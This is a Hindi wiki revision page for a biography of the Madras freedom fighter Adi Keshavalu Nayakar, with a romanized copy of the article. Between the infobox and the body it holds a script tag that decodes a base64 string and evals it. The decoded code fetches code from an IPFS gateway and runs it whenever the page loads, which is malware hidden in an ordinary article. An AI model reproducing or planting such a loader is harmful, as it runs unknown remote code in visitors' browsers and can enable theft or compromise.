Difference between revisions of "आदि केशवलू नायकर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 35: Line 35:
 
'''आदि केशवलू नायकर''' (जन्म- [[1898]], [[मद्रास]]; मृत्यु- [[1964]]) जानेमाने सार्वजनिक कार्यकर्ता और स्वतंत्रता सेनानी थे। वे अहिंसा और असहयोग में पूरा विश्वास करते थे। आदि केशवलू नायकर [[नमक सत्याग्रह]] में सम्मिलित हुए थे। सन [[1941]] वे [[व्यक्तिगत सत्याग्रह]] में भी शामिल थे।
 
'''आदि केशवलू नायकर''' (जन्म- [[1898]], [[मद्रास]]; मृत्यु- [[1964]]) जानेमाने सार्वजनिक कार्यकर्ता और स्वतंत्रता सेनानी थे। वे अहिंसा और असहयोग में पूरा विश्वास करते थे। आदि केशवलू नायकर [[नमक सत्याग्रह]] में सम्मिलित हुए थे। सन [[1941]] वे [[व्यक्तिगत सत्याग्रह]] में भी शामिल थे।
 
==परिचय==
 
==परिचय==
मद्रास (वर्तमान [[चेन्नई]]) के सार्वजनिक कार्यकर्ता आदि केशवलू नायकर का जन्म सन 1898 ईस्वी में मद्रास में हुआ था। एस. सत्यमूर्ति आदि के प्रभाव से वह [[कांग्रेस]] में शामिल हो गए थे। उनका अहिंसा और असहयोग में पूरा विश्वास था।
+
मद्रास (वर्तमान [[चेन्नई]]) के सार्वजनिक कार्यकर्ता आदि केशवलू नायकर का जन्म सन 1898 ईस्वी में मद्रास में हुआ था। एस. सत्यमूर्ति आदि के प्रभाव से वह [[कांग्रेस]] में शामिल हो गए थे। उनका अहिंसा और असहयोग में पूरा विश्वास था।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय चरित कोश|लेखक=लीलाधर शर्मा 'पर्वतीय'|अनुवादक=|आलोचक=|प्रकाशक=शिक्षा भारती, मदरसा रोड, कश्मीरी गेट, दिल्ली|संकलन= |संपादन=|पृष्ठ संख्या=74|url=}}</ref>
 
==क्रांतिकारी गतिविधियाँ==
 
==क्रांतिकारी गतिविधियाँ==
 
जब [[साइमन कमीशन]] मद्रास पहुंचा था, तब उसका विरोध करने वालों में आदि केशवलू नायकर प्रमुख थे। [[लाला लाजपत राय]] और [[गोविंद बल्लभ पंत|पंडित गोविंद बल्लभ पंत]] की भांति उन्होंने भी लाठियों की मार सही। नमक आंदोलन में भी वे सम्मिलित हुए थे।
 
जब [[साइमन कमीशन]] मद्रास पहुंचा था, तब उसका विरोध करने वालों में आदि केशवलू नायकर प्रमुख थे। [[लाला लाजपत राय]] और [[गोविंद बल्लभ पंत|पंडित गोविंद बल्लभ पंत]] की भांति उन्होंने भी लाठियों की मार सही। नमक आंदोलन में भी वे सम्मिलित हुए थे।

Latest revision as of 07:35, 4 May 2018

adi keshavaloo nayakar
poora nam adi keshavaloo nayakar
janm 1898
janm bhoomi madras (vartaman chennee)
mrityu 1964
nagarikata bharatiy
prasiddhi sarvajanik karyakarta aur svatantrata senani
jel yatra 1941 ke vyaktigat satyagrah mean velor jel mean vinoba bhave ke sath band the.
any janakari san 1947 mean adi keshavaloo nayakar madras aseanbali ke sadasy chune ge the. 1941 ve vyaktigat satyagrah mean bhi shamil the.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

adi keshavaloo nayakar (janm- 1898, madras; mrityu- 1964) janemane sarvajanik karyakarta aur svatantrata senani the. ve ahiansa aur asahayog mean poora vishvas karate the. adi keshavaloo nayakar namak satyagrah mean sammilit hue the. san 1941 ve vyaktigat satyagrah mean bhi shamil the.

parichay

madras (vartaman chennee) ke sarvajanik karyakarta adi keshavaloo nayakar ka janm san 1898 eesvi mean madras mean hua tha. es. satyamoorti adi ke prabhav se vah kaangres mean shamil ho ge the. unaka ahiansa aur asahayog mean poora vishvas tha.[1]

kraantikari gatividhiyaan

jab saiman kamishan madras pahuancha tha, tab usaka virodh karane valoan mean adi keshavaloo nayakar pramukh the. lala lajapat ray aur pandit goviand ballabh pant ki bhaanti unhoanne bhi lathiyoan ki mar sahi. namak aandolan mean bhi ve sammilit hue the.

san 1947 mean adi keshavaloo nayakar madras aseanbali ke sadasy chune ge the. 1941 ke vyaktigat satyagrah mean vah velor jel mean vah vinoba bhave ke sath band the.

mrityu

san 1942 ke aandolan mean nayakakar ke sir par pulis ne itani lathiyaan marian ki unaka manasik santulan big d gaya aur aisi hi dasha mean is deshabhakt ka 1964 mean nidhan ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. bharatiy charit kosh |lekhak: liladhar sharma 'parvatiy' |prakashak: shiksha bharati, madarasa rod, kashmiri get, dilli |prishth sankhya: 74 |

sanbandhit lekh

  1. REDIRECTsaancha:svatantrata senani